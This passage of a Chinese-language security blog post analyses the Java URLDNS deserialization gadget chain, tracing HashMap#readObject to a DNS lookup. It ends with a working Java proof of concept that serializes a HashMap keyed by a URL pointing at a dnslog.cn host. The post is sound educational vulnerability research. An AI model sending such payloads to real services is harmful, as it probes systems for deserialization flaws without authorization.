class="type">ObjectInputStream</span> <span class="variable">ois</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectInputStream</span>(<span class="keyword">new</span> <span class="title class_">FileInputStream</span>(serfile));</span><br><span class="line">        ois.readObject();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
<p>接着调用了<code>HashMap#putVal()</code>方法，该方法中调用了另一个方法<code>hash(key)</code>，跟进发现<code>HashMap#hash()</code>方法调用了<code>key.hashCode()</code>，即计算<code>key</code>的 Hash 值；<br>跟进跳转到<code>URL#hashCode()</code>方法，这里当<code>hashCode!=-1</code>时会直接返回。而如果<code>hashCode==-1</code>，就会执行下面的<code>handler.hashCode()</code>；</p>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-qdwiy9ls7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-qdwiy9ls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">synchronized</span> <span class="type">int</span> <span class="title function_">hashCode</span><span class="params">()</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (hashCode != -<span class="number">1</span>)</span><br><span class="line">        <span class="keyword">return</span> hashCode;</span><br><span class="line"></span><br><span class="line">    hashCode = handler.hashCode(<span class="built_in">this</span>);</span><br><span class="line">    <span class="keyword">return</span> hashCode;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>
<p>再次跟进，跳转到<code>URLStreamHandler#hashCode()</code>，该方法中调用了<code>URLStreamHandler#getHostAddress()</code>方法；<br>依次跟进到<code>URL#getHostAddress()</code>方法，这里调用了<code>InetAddress.getByName(host)</code>，该方法会根据主机名获取 IP 地址，即进行一次 DNS 查询，触发 DNSLog 记录</p>
<p>完整调用栈如下：</p>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-f9cfz1ls7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-f9cfz1ls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">HashMap#readObject()</span><br><span class="line">  HashMap#hash()</span><br><span class="line">    URL#hashCode()</span><br><span class="line">      URLStreamHandler#hashCode()</span><br><span class="line">        URLStreamHandler#getHostAddress()</span><br><span class="line">          URL#getHostAddress()</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
<p><a data-fancybox="gallery" data-src="/assets/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87-6.png" data-caption="Java安全漫谈-URLDNS篇-6"><img src="/assets/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87-6.png" alt="Java安全漫谈-URLDNS篇-6"></a></p>
<p>总的来说，这条链的触发原因是<code>HashMap</code>重写了<code>readObject()</code>方法，该方法中会触发<code>putVal(hash(key), key, value, false, false);</code>；跟进<code>hash(key)</code>发现存在<code>key.hashCode()</code>，即计算<code>key</code>的哈希值；<br>因为前面把<code>URL</code>对象当成<code>key</code>存进了<code>HashMap</code>，所以这里会触发<code>URL</code>对象的<code>hashCode()</code>方法；在<code>URL#hashCode()</code>中，当<code>hashCode==-1</code>时会触发<code>URLStreamHandler#hashCode()</code>，进行到后⾯的 <code>getHostAddress()</code>方法查询主机地址时，会触发 DNS 请求。</p>
<h2 id="利用链构造"><a href="#利用链构造" class="headerlink" title="利用链构造"></a>利用链构造</h2><p>根据前面的调用栈：</p>
<ul>
<li>首先需要一个<code>HashMap</code>和<code>URL</code>实例</li>
<li>设置<code>URL</code>实例的<code>hashCode</code>值为<code>-1</code></li>
<li>将<code>hashMap</code>对象进行序列化</li>
<li>反序列化触发漏洞</li>
</ul>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-ryqazbls7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-ryqazbls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> deserialization;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.ByteArrayInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ByteArrayOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Field;</span><br><span class="line"><span class="keyword">import</span> java.net.URL;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">DemoURLDNS</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">HashMap</span> <span class="variable">hashMap</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">HashMap</span>();</span><br><span class="line">        <span class="type">URL</span> <span class="variable">u</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">URL</span>(<span class="string">&quot;http://xxx.dnslog.cn&quot;</span>);</span><br><span class="line">        hashMap.put(u, <span class="string">&quot;test&quot;</span>);</span><br><span class="line"></span><br><span class="line">        <span class="type">Field</span> <span class="variable">field</span> <span class="operator">=</span> URL.class.getDeclaredField(<span class="string">&quot;hashCode&quot;</span>);</span><br><span class="line">        field.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        field.set(u, -<span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">        <span class="type">ByteArrayOutputStream</span> <span class="variable">baos</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ByteArrayOutputStream</span>();</span><br><span class="line">        <span class="type">ObjectOutputStream</span> <span class="variable">oos</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(baos);</span><br><span class="line">        oos.writeObject(hashMap);</span><br><span class="line">        oos.close();</span><br><span class="line"></span><br><span class="line">        <span class="type">ObjectInputStream</span> <span class="variable">ois</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectInputStream</span>(<span class="keyword">new</span> <span class="title class_">ByteArrayInputStream</span>(baos.toByteArray()));</span><br><span class="line">        ois.readObject();</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

  </div>
</article>


    <div class="blog-post-comments">
        <div id="utterances_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>


        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/lists/">Lists</a></li>
         
          <li><a href="/links/">Links</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E5%87%86%E5%A4%87"><span class="toc-number">1.</span> <span class="toc-text">环境准备</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#ysoserial"><span class="toc-number">1.1.</span> <span class="toc-text">ysoserial</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Gadget"><span class="toc-number">1.2.</span> <span class="toc-text">Gadget</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%82%E6%95%B0%E9%85%8D%E7%BD%AE"><span class="toc-number">1.3.</span> <span class="toc-text">参数配置</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90"><span class="toc-number">2.</span> <span class="toc-text">利用链分析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E7%B1%BB%E5%AF%B9%E8%B1%A1"><span class="toc-number">2.1.</span> <span class="toc-text">获取类对象</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9E%84%E9%80%A0%E6%81%B6%E6%84%8F%E5%BA%8F%E5%88%97%E5%8C%96%E5%AF%B9%E8%B1%A1"><span class="toc-number">2.2.</span> <span class="toc-text">构造恶意序列化对象</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E8%A7%A6%E5%8F%91"><span class="toc-number">3.</span> <span class="toc-text">反序列化触发</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E9%93%BE%E6%9E%84%E9%80%A0"><span class="toc-number">4.</span> <span class="toc-text">利用链构造</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87.html"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87.html&text=Java安全漫谈-URLDNS篇"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87.html&title=Java安全漫谈-URLDNS篇"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87.html&is_video=false&description=Java安全漫谈-URLDNS篇"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Java安全漫谈-URLDNS篇&body=Check out this article: https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87.html"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87.html&title=Java安全漫谈-URLDNS篇"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87.html&title=Java安全漫谈-URLDNS篇"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87.html&title=Java安全漫谈-URLDNS篇"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87.html&title=Java安全漫谈-URLDNS篇"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87.html&name=Java安全漫谈-URLDNS篇&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87.html&t=Java安全漫谈-URLDNS篇"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2017-2023
    M1r0ku
  </div>
  <div class="footer-right">
    <nav>
    <!--
      <ul>
        
          <li><a href="/">Home</a></li>
       
          <li><a href="/lists/">Lists</a></li>
       
          <li><a href="/links/">Links</a></li>
       
          <li><a href="/search/">Search</a></li>
       
      </ul>
    -->
      
      <!-- 不蒜子统计 -->
        <ul>
          
          <span id="busuanzi_container_site_pv">
            <i class="fa fa-eye"></i> <span id="busuanzi_value_site_pv"></span>
          </span>
          <span class="post-meta-divider">|</span>
          <span id="busuanzi_container_site_uv" style='display:none'>
            <i class="fa fa-user"></i> <span id="busuanzi_value_site_uv"></span> 
          </span>
          <script async src="//cdn.bootcdn.net/ajax/libs/busuanzi/2.3.0/bsz.pure.mini.js"></script>
          
      </ul>
      
    </nav>
    
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

  <script type="text/javascript">
        var _hmt = _hmt || [];
        (function() {
          var hm = document.createElement("script");
          hm.src = "https://hm.baidu.com/hm.js?864b0988af87a8a8f5f115cd29c265de";
          var s = document.getElementsByTagName("script")[0];
          s.parentNode.insertBefore(hm, s);
        })();
        </script>

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

    <script type="text/javascript">
      var utterances_repo = 'M1r0ku/m1r0ku.github.io';
      var utterances_issue_term = 'title';
      var utterances_label = 'Comment';
      var utterances_theme = 'photon-dark';

      (function(){
          var script = document.createElement('script');

          script.src = 'https://utteranc.es/client.js';
          script.setAttribute('repo', utterances_repo);
          script.setAttribute('issue-term', 'pathname');
          script.setAttribute('label', utterances_label);
          script.setAttribute('theme', utterances_theme);
          script.setAttribute('crossorigin', 'anonymous');
          script.async = true;
          (document.getElementById('utterances_thread')).appendChild(script);
      }());
  </script>


<!-- FancyBox -->

  <script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui@4.0/dist/fancybox.umd.js"></script>

<!-- hexo injector body_end start --><script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.bundle.min.js" crossorigin="anonymous"></script><link rel="stylesheet" href="/css/customize.css"><!-- hexo injector body_end end --></body>
</html>
